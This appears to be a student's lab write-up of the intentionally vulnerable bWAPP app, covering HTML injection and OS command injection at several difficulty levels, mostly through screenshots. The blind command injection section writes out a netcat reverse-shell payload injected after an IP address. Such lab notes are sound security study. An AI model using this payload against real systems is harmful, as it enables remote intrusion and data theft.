BWAPP - HackMD

# BWAPP ## HTML injection we know html injection as xss (cross side scripting). This vulnerability allow us to code into web page. if we code into web page and send to another people. And they run web page our code will run too ## HTML Injection - Reflected (GET) ![First look](https://i.imgur.com/ausoF1G.png) GET Method will show values in URL ### Low Level ![Try to input html language](https://i.imgur.com/RK60r7t.png) We can input html language in this section ### medium Level Do the same thing like a low level ![No working any more](https://i.imgur.com/7AflOH6.png) Try to encode the values before input ![Encode to url](https://i.imgur.com/ymt95XS.png) It's working ### High Level Do the same thing like medium level ![Don't work](https://i.imgur.com/zyzgtU1.png) Dont know how to exploit this level it might be a WAF (Web Application Firewall) ## HTML Injection - Reflected (POST) ![First look](https://i.imgur.com/Sbpu795.png) POST Method will not show values in URL ### Low Level ![Try to input html language](https://i.imgur.com/RCkAf8P.png) We can input html language in this section ### medium Level Do the same thing like a low level ![No working any more](https://i.imgur.com/JkxiAtb.png) Try to encode the data that we will input ![Encode to url](https://i.imgur.com/tjUxRn1.png) It's working ### High Level Do the same thing like medium level ![Don't work](https://i.imgur.com/Us7oh2P.png) Can not Exploit it it might be a WAF(Web Application Firewall) ## HTML Injection - Reflected (URL) ![First look](https://i.imgur.com/I0Sdp4G.png) we can change hostname ### Low level ![change hostname to google.com](https://i.imgur.com/J8UFfMe.png) use burpsuite to edit hostname ![use burpsuite to input html tag](https://i.imgur.com/ZTjWipA.png) ![result ](https://i.imgur.com/tYlvC8a.png) we can put html tag to this website because it dosen't recheck ### medium level ![](https://i.imgur.com/VEhmPQx.png) can not do like a photo ### high level can not exploit it ## HTML Injection - Stored (Blog) ![first look](https://i.imgur.com/uppOX6U.png) ### Low level we can try to input html tag ![can do](https://i.imgur.com/lqU54ea.png) ### medium level ![](https://i.imgur.com/0r4AS7L.png) can not bypass ### high level cannot bypass ## OS Command Injection ![first look](https://i.imgur.com/c83AZty.png) we know as shell injection is a web security vulnerability that allows an attacker to execute this section we can put linux command after ip ex: && | ### Low level ![ex](https://i.imgur.com/td2X8yZ.png) ![linux command](https://i.imgur.com/TW8GQdb.png) ### medium level ![same command](https://i.imgur.com/19eOrbF.png) It's still working ### high level not workking ## OS Command Injection - blind ![first look](https://i.imgur.com/NOeurTb.png) we can use web shell ### Low Level ![listening port](https://i.imgur.com/3BNcgc6.png) and use under command from pentestmonkey.com 127.0.0.1| rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.184.128 4444 >/tmp/f ![and we will get shell like this](https://i.imgur.com/oM3Wnwv.png ![find data ](https://i.imgur.com/2yXOuEF.png) ### medium level ![try the same command and it don't working]( ) try other command